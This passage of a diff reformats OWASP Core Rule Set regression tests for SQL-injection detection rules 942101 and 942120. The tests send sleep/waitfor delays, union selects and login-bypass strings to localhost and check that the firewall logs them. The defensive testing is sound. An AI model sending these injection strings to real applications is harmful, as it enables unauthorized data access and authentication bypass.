dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 6 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008ecc..f3a5ec7b7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -2,673 +2,631 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None - enabled: true - name: 942120.yaml tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: 